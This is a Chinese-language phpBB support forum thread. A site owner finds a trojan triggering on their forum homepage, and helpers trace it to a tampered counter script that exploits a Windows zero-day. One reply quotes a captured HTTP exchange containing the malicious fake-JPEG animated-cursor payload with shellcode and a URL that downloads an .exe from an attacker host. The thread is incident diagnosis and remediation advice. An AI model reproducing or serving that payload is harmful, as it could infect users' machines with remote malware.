請問,我最近的論壇好像中了"木馬" ,可能是裝了不良的MOD
我的空間是付費的,請問我要怎樣處理,才能找出這些木馬,把它清除?
打開論壇首頁,出現"木馬"
版主: 版主管理群
版面規則
本區是討論關於 phpBB 2.0.X 架設安裝上的問題,只要有安裝任何外掛,請到外掛討論相關版面按照公告格式發表。
(發表文章請按照公告格式發表,違者砍文)
本區是討論關於 phpBB 2.0.X 架設安裝上的問題,只要有安裝任何外掛,請到外掛討論相關版面按照公告格式發表。
(發表文章請按照公告格式發表,違者砍文)
打開論壇首頁,出現"木馬"
●作業系統:WindowXp (簡體中文)
●上網方式:ADSL
●安裝的程式:php + MySql
●使用版本:phpBB 2.0.21 mysql4.1.21-standard utf8
●網域名稱:http://www.slsfm.com
●連結網址:http://www.slsfm.com/*****SPAM*****
●測試帳號:test ●測試密碼:test
●上網方式:ADSL
●安裝的程式:php + MySql
●使用版本:phpBB 2.0.21 mysql4.1.21-standard utf8
●網域名稱:http://www.slsfm.com
●連結網址:http://www.slsfm.com/*****SPAM*****
●測試帳號:test ●測試密碼:test
沒有裝很多的話,先拔掉外掛,如果裝很多的話就......不好查了,不過你可以檢查一下相關需要設定資料夾 777 的先關閉看看
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
我把mod都移除了,但打開首頁,還是出現木馬.
我的資料庫是否中毒啦?
求救
我的資料庫是否中毒啦?
求救
●作業系統:WindowXp (簡體中文)
●上網方式:ADSL
●安裝的程式:php + MySql
●使用版本:phpBB 2.0.21 mysql4.1.21-standard utf8
●網域名稱:http://www.slsfm.com
●連結網址:http://www.slsfm.com/*****SPAM*****
●測試帳號:test ●測試密碼:test
●上網方式:ADSL
●安裝的程式:php + MySql
●使用版本:phpBB 2.0.21 mysql4.1.21-standard utf8
●網域名稱:http://www.slsfm.com
●連結網址:http://www.slsfm.com/*****SPAM*****
●測試帳號:test ●測試密碼:test
麻煩也請關心一下自己發表過的文章後續回應
http://phpbb-tw.net/phpbb/viewtopic.php?p=255791#255791
http://phpbb-tw.net/phpbb/viewtopic.php?p=255838#255838
問題的根本不是出在你的站, 而是player.htm所連結的counter.php檔被動手腳了
經檢查並與底下的文章對照, 發現這是利用微軟最新的漏洞所發動的Zero-Day Attack
相關資料請見PCZONE的【警告】台灣出現零時差攻擊 (Zero-Day Attack)
或是大炮開講裡的同篇文章台灣出現零時差攻擊 (Zero-Day Attack)
http://phpbb-tw.net/phpbb/viewtopic.php?p=255791#255791
http://phpbb-tw.net/phpbb/viewtopic.php?p=255838#255838
問題的根本不是出在你的站, 而是player.htm所連結的counter.php檔被動手腳了
經檢查並與底下的文章對照, 發現這是利用微軟最新的漏洞所發動的Zero-Day Attack
代碼: 選擇全部
GET /muxiao2.jpg HTTP/1.1
Referer: http://222.73.19.183:8888/count2.php?uuid=1552307&ip1=xxxxxx&c_page=http%3A//www.slsfm.com/*****SPAM*****/&refer1=http%3A//www.slsfm.com/*****SPAM*****/&c_screen=1024x768
Host: jdnx.movie721.cn
HTTP/1.1 200 OK
Content-Type: image/jpeg
RIFF....ACONanih$...$....... ...........................TSIL........TSIL........anihR...01230123012301230123012301230123.444444444444444444444444444.....................%..d..0....R..:...........K...h....j............^...........W.......3.I3.......G._......[........>..cmd >.B./c "...3.PPh....RSP.!............>....t.@..>.."3.>.P...T3.3.....T} >...............3.>.C,....QSPPPPPPWP...........j...8Ut..x.....t.U...@...hon..hurlm...D$.P./...P................jlhntdl...D$.P.....P................h32..huser...D$.P.....P.[..............._...h....P.z........K...h..
|P.f........7...hr...P.R........M...hO.O.P.>............h.N..P.*.......3.d.@0..x.>.@.>.p..>.@....>.@4..|>.@<.`6.l$$6.E<6.T.x..>.J.>.Z ...;I>.4...3.3.....t...
....6;|$(u.>.Z$..f>..K>.Z...>.....6.D$.a......http://jdnx.movie721.cn/movie721.exe.或是大炮開講裡的同篇文章台灣出現零時差攻擊 (Zero-Day Attack)
謝絕所有私人訊息詢問外掛相關問題
有問題請直接於版上發表, 集思廣議絕對比專挑特定人士詢問來的好
竹貓禁止發表含破解相關的軟體, 違者砍文
不要跟我講別的地方都可以發, 為什麼竹貓就不行
免費不等於破解, 傻傻的搞不清楚
有問題請直接於版上發表, 集思廣議絕對比專挑特定人士詢問來的好
竹貓禁止發表含破解相關的軟體, 違者砍文
不要跟我講別的地方都可以發, 為什麼竹貓就不行
免費不等於破解, 傻傻的搞不清楚
倉大你真強的, 連 Zero-Day Attack 都給你對照找了出來.
能夠跟你學習真感榮幸!!
.
能夠跟你學習真感榮幸!!
.
舊站台經已結朿了, 學生們可到遊戲站玩玩 Flash Game (不必註冊) 免費 Flash Game
在此學到很多架站知識, 永遠多謝:
心靈捕手老師, ~倉木麻衣~, 依夢兒 及 神川小羽各位大大相助
在此學到很多架站知識, 永遠多謝:
心靈捕手老師, ~倉木麻衣~, 依夢兒 及 神川小羽各位大大相助
目前微軟方面尚未釋出修正檔, 但是已有資安公司釋出的第三方的非官方補丁
eeye 是間頗具威信的國外資安公司, 微軟有許多漏洞都是由這家公司發現
下載位置:eEye’s temporary zero-day patch
安裝時, 直接按 next 進行下一步即可, 不需要按「Download Blink」
當微軟釋出官方修正檔時, 請記得先反裝這個第三方補丁再行安裝
此補丁有提供反安裝功能
eeye 是間頗具威信的國外資安公司, 微軟有許多漏洞都是由這家公司發現
下載位置:eEye’s temporary zero-day patch
安裝時, 直接按 next 進行下一步即可, 不需要按「Download Blink」
當微軟釋出官方修正檔時, 請記得先反裝這個第三方補丁再行安裝
ps.Organizations that choose to employ this workaround should take the steps required to uninstall it once the official Microsoft patch is released.
此補丁有提供反安裝功能
謝絕所有私人訊息詢問外掛相關問題
有問題請直接於版上發表, 集思廣議絕對比專挑特定人士詢問來的好
竹貓禁止發表含破解相關的軟體, 違者砍文
不要跟我講別的地方都可以發, 為什麼竹貓就不行
免費不等於破解, 傻傻的搞不清楚
有問題請直接於版上發表, 集思廣議絕對比專挑特定人士詢問來的好
竹貓禁止發表含破解相關的軟體, 違者砍文
不要跟我講別的地方都可以發, 為什麼竹貓就不行
免費不等於破解, 傻傻的搞不清楚
其實我想請教倉大一件事, 就如kkt所知道的一樣
因為我有點想知道, 增進一點知識@@請問這段東西倉大是怎麼取出來@@
GET /muxiao2.jpg HTTP/1.1
.........
.........
(恕刪...)
目前狀態
GoKo Music進度: 10%
問個問題不要緊,可是沒有發文格式、問題不夠詳細情況,難道要用猜嗎?
新手必讀
[教學] 基本認識、學習、隨我架設phpBB的新手通 -更新至2.0.22
問問題的技巧
http://www.phpbb-tw.net/phpbb/viewtopic.php?t=44340
MOD安裝教學及轉碼
http://www.phpbb-tw.net/phpbb/viewtopic.php?t=22832
GoKo Music進度: 10%
問個問題不要緊,可是沒有發文格式、問題不夠詳細情況,難道要用猜嗎?
新手必讀
[教學] 基本認識、學習、隨我架設phpBB的新手通 -更新至2.0.22
問問題的技巧
http://www.phpbb-tw.net/phpbb/viewtopic.php?t=44340
MOD安裝教學及轉碼
http://www.phpbb-tw.net/phpbb/viewtopic.php?t=22832
不是什麼很高深的技巧, 利用抓封包軟體就可以取得了jwxinst 寫:請問這段東西倉大是怎麼取出來@@
GET /muxiao2.jpg HTTP/1.1
.........
.........
例如 SmartSniff、Wireshark(前身為Ethereal, 需安裝WinPcap)
謝絕所有私人訊息詢問外掛相關問題
有問題請直接於版上發表, 集思廣議絕對比專挑特定人士詢問來的好
竹貓禁止發表含破解相關的軟體, 違者砍文
不要跟我講別的地方都可以發, 為什麼竹貓就不行
免費不等於破解, 傻傻的搞不清楚
有問題請直接於版上發表, 集思廣議絕對比專挑特定人士詢問來的好
竹貓禁止發表含破解相關的軟體, 違者砍文
不要跟我講別的地方都可以發, 為什麼竹貓就不行
免費不等於破解, 傻傻的搞不清楚
哦!!!謝謝兩位的指導^^
目前狀態
GoKo Music進度: 10%
問個問題不要緊,可是沒有發文格式、問題不夠詳細情況,難道要用猜嗎?
新手必讀
[教學] 基本認識、學習、隨我架設phpBB的新手通 -更新至2.0.22
問問題的技巧
http://www.phpbb-tw.net/phpbb/viewtopic.php?t=44340
MOD安裝教學及轉碼
http://www.phpbb-tw.net/phpbb/viewtopic.php?t=22832
GoKo Music進度: 10%
問個問題不要緊,可是沒有發文格式、問題不夠詳細情況,難道要用猜嗎?
新手必讀
[教學] 基本認識、學習、隨我架設phpBB的新手通 -更新至2.0.22
問問題的技巧
http://www.phpbb-tw.net/phpbb/viewtopic.php?t=44340
MOD安裝教學及轉碼
http://www.phpbb-tw.net/phpbb/viewtopic.php?t=22832